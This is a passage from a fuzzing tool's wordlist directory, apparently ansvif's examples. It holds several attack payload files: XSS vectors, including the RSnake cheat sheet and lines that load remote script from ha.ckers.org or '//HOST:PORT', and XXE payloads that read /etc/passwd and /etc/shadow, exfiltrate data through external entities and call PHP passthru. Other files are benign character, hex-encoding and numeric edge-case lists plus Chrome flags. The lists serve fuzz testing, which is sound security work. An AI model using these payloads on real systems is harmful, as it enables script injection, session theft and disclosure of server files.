onblur=alert(1)>lose focus! 10 | <x onclick=alert(1)>click this! 11 | <x oncopy=alert(1)>copy this! 12 | <x oncontextmenu=alert(1)>right click this! 13 | <x oncut=alert(1)>copy this! 14 | <x ondblclick=alert(1)>double click this! 15 | <x ondrag=alert(1)>drag this! 16 | <x contenteditable onfocus=alert(1)>focus this! 17 | <x contenteditable oninput=alert(1)>input here! 18 | <x contenteditable onkeydown=alert(1)>press any key! 19 | <x contenteditable onkeypress=alert(1)>press any key! 20 | <x contenteditable onkeyup=alert(1)>press any key! 21 | <x onmousedown=alert(1)>click this! 22 | <x onmousemove=alert(1)>hover this! 23 | <x onmouseout=alert(1)>hover this! 24 | <x onmouseover=alert(1)>hover this! 25 | <x onmouseup=alert(1)>click this! 26 | <x contenteditable onpaste=alert(1)>paste here! 27 | <script>alert(1)// 28 | <script>alert(1)<!– 29 | <script src=//brutelogic.com.br/1.js> 30 | <script src=//3334957647/1> 31 | %3Cx onxxx=alert(1) 32 | <%78 onxxx=1 33 | <x %6Fnxxx=1 34 | <x o%6Exxx=1 35 | <x on%78xx=1 36 | <x onxxx%3D1 37 | <X onxxx=1 38 | <x OnXxx=1 39 | <X OnXxx=1 40 | <x onxxx=1 onxxx=1 41 | <x/onxxx=1 42 | <x%09onxxx=1 43 | <x%0Aonxxx=1 44 | <x%0Conxxx=1 45 | <x%0Donxxx=1 46 | <x%2Fonxxx=1 47 | <x 1='1'onxxx=1 48 | <x 1="1"onxxx=1 49 | <x </onxxx=1 50 | <x 1=">" onxxx=1 51 | <http://onxxx%3D1/ 52 | <x onxxx=alert(1) 1=' 53 | <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> 54 | 'onload=alert(1)><svg/1=' 55 | '>alert(1)</script><script/1=' 56 | */alert(1)</script><script>/* 57 | */alert(1)">'onload="/*<svg/1=' 58 | `-alert(1)">'onload="`<svg/1=' 59 | */</script>'>alert(1)/*<script/1=' 60 | <script>alert(1)</script> 61 | <script src=javascript:alert(1)> 62 | <iframe src=javascript:alert(1)> 63 | <embed src=javascript:alert(1)> 64 | <a href=javascript:alert(1)>click 65 | <math><brute href=javascript:alert(1)>click 66 | <form action=javascript:alert(1)><input type=submit> 67 | <isindex action=javascript:alert(1) type=submit value=click> 68 | <form><button formaction=javascript:alert(1)>click 69 | <form><input formaction=javascript:alert(1) type=submit value=click> 70 | <form><input formaction=javascript:alert(1) type=image value=click> 71 | <form><input formaction=javascript:alert(1) type=image src=SOURCE> 72 | <isindex formaction=javascript:alert(1) type=submit value=click> 73 | <object data=javascript:alert(1)> 74 | <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 75 | <svg><script xlink:href=data:,alert(1) /> 76 | <math><brute xlink:href=javascript:alert(1)>click 77 | <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> 78 | <html ontouchstart=alert(1)> 79 | <html ontouchend=alert(1)> 80 | <html ontouchmove=alert(1)> 81 | <html ontouchcancel=alert(1)> 82 | <body onorientationchange=alert(1)> 83 | "><img src=1 onerror=alert(1)>.gif 84 | <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> 85 | GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; 86 | <script src="data:&comma;alert(1)// 87 | "><script src=data:&comma;alert(1)// 88 | <script src="//brutelogic.com.br&sol;1.js&num; 89 | "><script src=//brutelogic.com.br&sol;1.js&num; 90 | <link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 91 | "><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 92 | <base href=//0> 93 | <script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) 94 | <body onload=alert(1)> 95 | <body onpageshow=alert(1)> 96 | <body onfocus=alert(1)> 97 | <body onhashchange=alert(1)><a href=#x>click this!#x 98 | <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x 99 | <body onscroll=alert(1)><br><br><br><br> 100 | <br><br><br><br><br><br><br><br><br><br> 101 | <br><br><br><br><br><br><br><br><br><br> 102 | <br><br><br><br><br><br><x id=x>#x 103 | <body onresize=alert(1)>press F12! 104 | <body onhelp=alert(1)>press F1! (MSIE) 105 | <marquee onstart=alert(1)> 106 | <marquee loop=1 width=0 onfinish=alert(1)> 107 | <audio src onloadstart=alert(1)> 108 | <video onloadstart=alert(1)><source> 109 | <input autofocus onblur=alert(1)> 110 | <keygen autofocus onfocus=alert(1)> 111 | <form onsubmit=alert(1)><input type=submit> 112 | <select onchange=alert(1)><option>1<option>2 113 | <menu id=x contextmenu=x onshow=alert(1)>right click me! 114 | -------------------------------------------------------------------------------- /examples/nasty/XSS-RSNAKE.txt: -------------------------------------------------------------------------------- 1 | # credit to rsnake 2 | <SCRIPT>alert('XSS');</SCRIPT> 3 | '';!--"<XSS>=&{()} 4 | <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> 5 | <IMG SRC="javascript:alert('XSS');"> 6 | <IMG SRC=javascript:alert('XSS')> 7 | <IMG SRC=JaVaScRiPt:alert('XSS')> 8 | <IMG SRC=javascript:alert(&quot;XSS&quot;)> 9 | <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> 10 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> 11 | SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> 12 | <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> 13 | <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 14 | <IMG SRC="jav ascript:alert('XSS');"> 15 | <IMG SRC="jav&#x09;ascript:alert('XSS');"> 16 | <IMG SRC="jav&#x0A;ascript:alert('XSS');"> 17 | <IMG SRC="jav&#x0D;ascript:alert('XSS');"> 18 | <IMG SRC=" &#14; javascript:alert('XSS');"> 19 | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> 20 | <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> 21 | <IMG SRC="javascript:alert('XSS')" 22 | <SCRIPT>a=/XSS/ 23 | \";alert('XSS');// 24 | <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> 25 | <BODY BACKGROUND="javascript:alert('XSS')"> 26 | <BODY ONLOAD=alert('XSS')> 27 | <IMG DYNSRC="javascript:alert('XSS')"> 28 | <IMG LOWSRC="javascript:alert('XSS')"> 29 | <BGSOUND SRC="javascript:alert('XSS');"> 30 | <BR SIZE="&{alert('XSS')}"> 31 | <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> 32 | <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> 33 | <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> 34 | <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> 35 | <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> 36 | <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> 37 | <IMG SRC='vbscript:msgbox("XSS")'> 38 | <IMG SRC="mocha:[code]"> 39 | <IMG SRC="livescript:[code]"> 40 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 41 | <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 42 | <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> 43 | <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> 44 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME> 45 | <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> 46 | <TABLE BACKGROUND="javascript:alert('XSS')"> 47 | <DIV STYLE="background-image: url(javascript:alert('XSS'))"> 48 | <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> 49 | <DIV STYLE="width: expression(alert('XSS'));"> 50 | <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 51 | <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> 52 | <XSS STYLE="xss:expression(alert('XSS'))"> 53 | exp/*<XSS STYLE='no\xss:noxss("*//*"); 54 | <STYLE TYPE="text/javascript">alert('XSS');</STYLE> 55 | <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> 56 | <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 57 | <BASE HREF="javascript:alert('XSS');//"> 58 | <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> 59 | <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> 60 | getURL("javascript:alert('XSS')") 61 | a="get"; 62 | <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> 63 | <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> 64 | <HTML><BODY> 65 | <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> 66 | <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> 67 | <? echo('<SCR)'; 68 | <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> 69 | <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- 70 | <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 71 | <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> 72 | <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 73 | <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> 74 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> 75 | -------------------------------------------------------------------------------- /examples/nasty/XXE-Fuzzing.txt: -------------------------------------------------------------------------------- 1 | <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" > 2 | <?xml version="1.0" encoding="ISO-8859-1"?> 3 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 4 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 5 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 6 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 7 | <?xml version="1.0" encoding="ISO-8859-1"?><test></test> 8 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 9 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 10 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> 11 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> 12 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> 13 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 14 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 15 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 16 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo> 17 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]> 18 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> 19 | <test></test> 20 | <![CDATA[<test></test>]]> 21 | &foo; 22 | %foo; 23 | count(/child::node()) 24 | x' or name()='username' or 'x'='y 25 | <name>','')); phpinfo(); exit;/*</name> 26 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 27 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 28 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 29 | <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 30 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> 31 | <foo><![CDATA[' or 1=1 or ''=']]></foo> 32 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> 33 | <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 34 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 35 | <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 36 | <xml SRC="xsstest.xml" ID=I></xml> 37 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 38 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> 39 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet> 40 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet> 41 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet> 42 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 43 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 44 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 45 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]> 46 | <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]> 47 | <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int; 48 | <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>"> 49 | <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 50 | <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 51 | <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> 52 | -------------------------------------------------------------------------------- /examples/nasty/alphanum-case-extra.txt: -------------------------------------------------------------------------------- 1 | ! 2 | " 3 | # 4 | $ 5 | % 6 | & 7 | ' 8 | ( 9 | ) 10 | * 11 | + 12 | , 13 | - 14 | . 15 | / 16 | 0 17 | 1 18 | 2 19 | 3 20 | 4 21 | 5 22 | 6 23 | 7 24 | 8 25 | 9 26 | : 27 | ; 28 | < 29 | = 30 | > 31 | ? 32 | @ 33 | A 34 | B 35 | C 36 | D 37 | E 38 | F 39 | G 40 | H 41 | I 42 | J 43 | K 44 | L 45 | M 46 | N 47 | O 48 | P 49 | Q 50 | R 51 | S 52 | T 53 | U 54 | V 55 | W 56 | X 57 | Y 58 | Z 59 | [ 60 | \ 61 | ] 62 | ^ 63 | _ 64 | ` 65 | a 66 | b 67 | c 68 | d 69 | e 70 | f 71 | g 72 | h 73 | i 74 | j 75 | k 76 | l 77 | m 78 | n 79 | o 80 | p 81 | q 82 | r 83 | s 84 | t 85 | u 86 | v 87 | w 88 | x 89 | y 90 | z 91 | { 92 | | 93 | } 94 | ~ 95 | 96 | -------------------------------------------------------------------------------- /examples/nasty/alphanum-case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /examples/nasty/char.txt: -------------------------------------------------------------------------------- 1 | a 2 | b 3 | c 4 | d 5 | e 6 | f 7 | g 8 | h 9 | i 10 | j 11 | k 12 | l 13 | m 14 | n 15 | o 16 | p 17 | q 18 | r 19 | s 20 | t 21 | u 22 | v 23 | w 24 | x 25 | y 26 | z 27 | -------------------------------------------------------------------------------- /examples/nasty/doble-uri-hex.txt: -------------------------------------------------------------------------------- 1 | %2500 2 | %2501 3 | %2502 4 | %2503 5 | %2504 6 | %2505 7 | %2506 8 | %2507 9 | %2508 10 | %2509 11 | %250a 12 | %250b 13 | %250c 14 | %250d 15 | %250e 16 | %250f 17 | %2510 18 | %2511 19 | %2512 20 | %2513 21 | %2514 22 | %2515 23 | %2516 24 | %2517 25 | %2518 26 | %2519 27 | %251a 28 | %251b 29 | %251c 30 | %251d 31 | %251e 32 | %251f 33 | %2520 34 | %2521 35 | %2522 36 | %2523 37 | %2524 38 | %2525 39 | %2526 40 | %2527 41 | %2528 42 | %2529 43 | %252a 44 | %252b 45 | %252c 46 | %252d 47 | %252e 48 | %252f 49 | %2530 50 | %2531 51 | %2532 52 | %2533 53 | %2534 54 | %2535 55 | %2536 56 | %2537 57 | %2538 58 | %2539 59 | %253a 60 | %253b 61 | %253c 62 | %253d 63 | %253e 64 | %253f 65 | %2540 66 | %2541 67 | %2542 68 | %2543 69 | %2544 70 | %2545 71 | %2546 72 | %2547 73 | %2548 74 | %2549 75 | %254a 76 | %254b 77 | %254c 78 | %254d 79 | %254e 80 | %254f 81 | %2550 82 | %2551 83 | %2552 84 | %2553 85 | %2554 86 | %2555 87 | %2556 88 | %2557 89 | %2558 90 | %2559 91 | %255a 92 | %255b 93 | %255c 94 | %255d 95 | %255e 96 | %255f 97 | %2560 98 | %2561 99 | %2562 100 | %2563 101 | %2564 102 | %2565 103 | %2566 104 | %2567 105 | %2568 106 | %2569 107 | %256a 108 | %256b 109 | %256c 110 | %256d 111 | %256e 112 | %256f 113 | %2570 114 | %2571 115 | %2572 116 | %2573 117 | %2574 118 | %2575 119 | %2576 120 | %2577 121 | %2578 122 | %2579 123 | %257a 124 | %257b 125 | %257c 126 | %257d 127 | %257e 128 | %257f 129 | %2580 130 | %2581 131 | %2582 132 | %2583 133 | %2584 134 | %2585 135 | %2586 136 | %2587 137 | %2588 138 | %2589 139 | %258a 140 | %258b 141 | %258c 142 | %258d 143 | %258e 144 | %258f 145 | %2590 146 | %2591 147 | %2592 148 | %2593 149 | %2594 150 | %2595 151 | %2596 152 | %2597 153 | %2598 154 | %2599 155 | %259a 156 | %259b 157 | %259c 158 | %259d 159 | %259e 160 | %259f 161 | %25a0 162 | %25a1 163 | %25a2 164 | %25a3 165 | %25a4 166 | %25a5 167 | %25a6 168 | %25a7 169 | %25a8 170 | %25a9 171 | %25aa 172 | %25ab 173 | %25ac 174 | %25ad 175 | %25ae 176 | %25af 177 | %25b0 178 | %25b1 179 | %25b2 180 | %25b3 181 | %25b4 182 | %25b5 183 | %25b6 184 | %25b7 185 | %25b8 186 | %25b9 187 | %25ba 188 | %25bb 189 | %25bc 190 | %25bd 191 | %25be 192 | %25bf 193 | %25c0 194 | %25c1 195 | %25c2 196 | %25c3 197 | %25c4 198 | %25c5 199 | %25c6 200 | %25c7 201 | %25c8 202 | %25c9 203 | %25ca 204 | %25cb 205 | %25cc 206 | %25cd 207 | %25ce 208 | %25cf 209 | %25d0 210 | %25d1 211 | %25d2 212 | %25d3 213 | %25d4 214 | %25d5 215 | %25d6 216 | %25d7 217 | %25d8 218 | %25d9 219 | %25da 220 | %25db 221 | %25dc 222 | %25dd 223 | %25de 224 | %25df 225 | %25e0 226 | %25e1 227 | %25e2 228 | %25e3 229 | %25e4 230 | %25e5 231 | %25e6 232 | %25e7 233 | %25e8 234 | %25e9 235 | %25ea 236 | %25eb 237 | %25ec 238 | %25ed 239 | %25ee 240 | %25ef 241 | %25f0 242 | %25f1 243 | %25f2 244 | %25f3 245 | %25f4 246 | %25f5 247 | %25f6 248 | %25f7 249 | %25f8 250 | %25f9 251 | %25fa 252 | %25fb 253 | %25fc 254 | %25fd 255 | %25fe 256 | %25ff 257 | -------------------------------------------------------------------------------- /examples/nasty/lol: -------------------------------------------------------------------------------- 1 | 𝓣𝓱𝓮.𝓺𝓾𝓲𝓬𝓴.𝓫𝓻𝓸𝔀𝓷.𝓯𝓸𝔁.𝓳𝓾𝓶𝓹𝓼.𝓸𝓿𝓮𝓻.𝓽𝓱𝓮.𝓵𝓪𝔃𝔂.𝓭𝓸𝓰 2 | -------------------------------------------------------------------------------- /examples/nasty/numeric-fields-only.txt: -------------------------------------------------------------------------------- 1 | 16649142472222295162770764775 2 | 2.07564741538e+16 3 | 3.38800266804e+16 4 | -139333426276771806651771 5 | -1.97684995314e+16 6 | 0x481b49d0f8d5a3e7f821066157c37c 7 | 9223372036854775807 8 | 9223372036854775808 9 | -9223372036854775809 10 | 1.79769313486e+308 11 | 1.79769313486e+308 12 | 2139095040 13 | 2.22507385851e-308 14 | 79228162514264337593543950336L 15 | 79228162514264337593543950336l 16 | 79228162514264337593543950336B 17 | inf 18 | Infinity 19 | -Infinity 20 | NaN 21 | 255 22 | 65535 23 | 4294967295 24 | 18446744073709551615 25 | 256 26 | 65536 27 | 4294967296 28 | 18446744073709551616 29 | 127 30 | 32767 31 | 2147483647 32 | 9223372036854775807 33 | 128 34 | 32768 35 | 2147483648 36 | 9223372036854775808 37 | -128 38 | -32768 39 | -2147483648 40 | -9223372036854775808 41 | -129 42 | -32769 43 | -2147483649 44 | -9223372036854775809 45 | -------------------------------------------------------------------------------- /examples/nasty/special-chars.txt: -------------------------------------------------------------------------------- 1 | ~ 2 | ! 3 | @ 4 | # 5 | $ 6 | % 7 | ^ 8 | & 9 | * 10 | ( 11 | ) 12 | _ 13 | _ 14 | + 15 | = 16 | { 17 | } 18 | ] 19 | [ 20 | | 21 | \ 22 | ` 23 | , 24 | . 25 | / 26 | ? 27 | ; 28 | : 29 | ' 30 | " 31 | < 32 | > 33 | -------------------------------------------------------------------------------- /examples/nasty/uri-hex.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %01 3 | %02 4 | %03 5 | %04 6 | %05 7 | %06 8 | %07 9 | %08 10 | %09 11 | %0a 12 | %0b 13 | %0c 14 | %0d 15 | %0e 16 | %0f 17 | %10 18 | %11 19 | %12 20 | %13 21 | %14 22 | %15 23 | %16 24 | %17 25 | %18 26 | %19 27 | %1a 28 | %1b 29 | %1c 30 | %1d 31 | %1e 32 | %1f 33 | %20 34 | %21 35 | %22 36 | %23 37 | %24 38 | %25 39 | %26 40 | %27 41 | %28 42 | %29 43 | %2a 44 | %2b 45 | %2c 46 | %2d 47 | %2e 48 | %2f 49 | %30 50 | %31 51 | %32 52 | %33 53 | %34 54 | %35 55 | %36 56 | %37 57 | %38 58 | %39 59 | %3a 60 | %3b 61 | %3c 62 | %3d 63 | %3e 64 | %3f 65 | %40 66 | %41 67 | %42 68 | %43 69 | %44 70 | %45 71 | %46 72 | %47 73 | %48 74 | %49 75 | %4a 76 | %4b 77 | %4c 78 | %4d 79 | %4e 80 | %4f 81 | %50 82 | %51 83 | %52 84 | %53 85 | %54 86 | %55 87 | %56 88 | %57 89 | %58 90 | %59 91 | %5a 92 | %5b 93 | %5c 94 | %5d 95 | %5e 96 | %5f 97 | %60 98 | %61 99 | %62 100 | %63 101 | %64 102 | %65 103 | %66 104 | %67 105 | %68 106 | %69 107 | %6a 108 | %6b 109 | %6c 110 | %6d 111 | %6e 112 | %6f 113 | %70 114 | %71 115 | %72 116 | %73 117 | %74 118 | %75 119 | %76 120 | %77 121 | %78 122 | %79 123 | %7a 124 | %7b 125 | %7c 126 | %7d 127 | %7e 128 | %7f 129 | %80 130 | %81 131 | %82 132 | %83 133 | %84 134 | %85 135 | %86 136 | %87 137 | %88 138 | %89 139 | %8a 140 | %8b 141 | %8c 142 | %8d 143 | %8e 144 | %8f 145 | %90 146 | %91 147 | %92 148 | %93 149 | %94 150 | %95 151 | %96 152 | %97 153 | %98 154 | %99 155 | %9a 156 | %9b 157 | %9c 158 | %9d 159 | %9e 160 | %9f 161 | %a0 162 | %a1 163 | %a2 164 | %a3 165 | %a4 166 | %a5 167 | %a6 168 | %a7 169 | %a8 170 | %a9 171 | %aa 172 | %ab 173 | %ac 174 | %ad 175 | %ae 176 | %af 177 | %b0 178 | %b1 179 | %b2 180 | %b3 181 | %b4 182 | %b5 183 | %b6 184 | %b7 185 | %b8 186 | %b9 187 | %ba 188 | %bb 189 | %bc 190 | %bd 191 | %be 192 | %bf 193 | %c0 194 | %c1 195 | %c2 196 | %c3 197 | %c4 198 | %c5 199 | %c6 200 | %c7 201 | %c8 202 | %c9 203 | %ca 204 | %cb 205 | %cc 206 | %cd 207 | %ce 208 | %cf 209 | %d0 210 | %d1 211 | %d2 212 | %d3 213 | %d4 214 | %d5 215 | %d6 216 | %d7 217 | %d8 218 | %d9 219 | %da 220 | %db 221 | %dc 222 | %dd 223 | %de 224 | %df 225 | %e0 226 | %e1 227 | %e2 228 | %e3 229 | %e4 230 | %e5 231 | %e6 232 | %e7 233 | %e8 234 | %e9 235 | %ea 236 | %eb 237 | %ec 238 | %ed 239 | %ee 240 | %ef 241 | %f0 242 | %f1 243 | %f2 244 | %f3 245 | %f4 246 | %f5 247 | %f6 248 | %f7 249 | %f8 250 | %f9 251 | %fa 252 | %fb 253 | %fc 254 | %fd 255 | %fe 256 | %ff 257 | -------------------------------------------------------------------------------- /examples/specific/blank.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/specific/blank.txt -------------------------------------------------------------------------------- /examples/specific/chrome_t.txt: -------------------------------------------------------------------------------- 1 | --ash-force-desktop 2 | --disable-3d-apis 3 | --disable-accelerated-video 4 | --disable-background-mode 5 | --disable-gpu 6 | --disable-plugins 7 | --disable-plugins-discovery 8 | --disable-preconnect 9 | --disable-translate 10 | --dns-prefetch-disable 11 | --enable-kiosk-mode 12 | --incognito 13 | --media-cache-size 14 | --multi-profiles 15 | --new-profile-management 16 | --no-experiments 17 | --no-pings 18 | --no-referrers 19 | --purge-memory-button 20 | --reset-variation-state 21 | --restore-last-session 22 | --ssl-version-min 23 | --start-maximized 24 | --window-position 25 | --window-size 26 | -------------------------------------------------------------------------------- /examples/specific/flag_chars.txt: -------------------------------------------------------------------------------- 1 | -A 2 | -B 3 | -C 4 | -D 5 | -E 6 | -F 7 | -G 8 | -H 9 | -I 10 | -J 11 | -K 12 | -L 13 | -M 14 | -N 15 | 